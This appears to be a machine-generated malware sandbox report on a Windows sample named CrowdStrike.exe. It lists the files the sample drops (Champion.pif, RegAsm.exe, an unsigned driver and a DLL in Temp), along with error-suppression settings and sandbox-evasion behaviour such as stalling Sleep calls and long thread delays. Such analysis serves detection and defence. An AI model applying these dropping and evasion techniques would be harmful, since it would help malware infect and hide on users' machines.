        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
        Source: CrowdStrike.exeStatic PE information: real checksum: 0x133016 should be: 0x61a253

        Persistence and Installation Behavior

        barindex
        Drops PE files with a suspicious file extension
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\564784\Champion.pifJump to dropped file
        Sample is not signed and drops a device driver
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sysJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\564784\Champion.pifJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifFile created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sysJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\OpenFileFinder.dllJump to dropped file
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\CrowdStrike.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Found stalling execution ending in API Sleep call
        Source: C:\Users\user\Desktop\CrowdStrike.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 26E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 77E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 87E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 9AA0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 9E10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: AE10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: BE10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: CE10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: DE10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: EE10000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: F4F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 104F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 114F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeMemory allocated: 124F0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599890Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599781Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599671Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599562Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599453Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599343Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599234Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599125Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599015Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598906Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598797Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598687Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598578Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598455Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598218Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598109Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597999Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597889Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597777Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597656Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597520Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597234Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597060Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 596937Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 596827Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599648Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599286Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599171Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 599062Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598953Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598843Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598734Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598623Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598515Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598403Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 598093Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597966Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597859Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597743Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597640Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597531Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597421Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597312Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597203Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeThread delayed: delay time: 597093Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeWindow / User API: threadDelayed 3716Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeWindow / User API: threadDelayed 6040Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sysJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\OpenFileFinder.dllJump to dropped file
        Source: C:\Windows\SysWOW64\timeout.exe TID: 7592Thread sleep count: 130 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -23980767295822402s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599890s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599781s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599671s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599562s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599453s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599343s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599234s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599125s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599015s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598906s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598797s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598687s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598578s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598455s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598328s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598218s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598109s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597999s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597889s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597777s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597656s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597520s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597234s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597060s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -596937s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -596827s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599875s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599765s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599648s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599546s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599437s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599286s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599171s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -599062s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598953s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598843s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598734s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598623s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598515s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598403s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -598093s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597966s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597859s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe TID: 6320Thread sleep time: -597743s >= -30000sJump to behavior
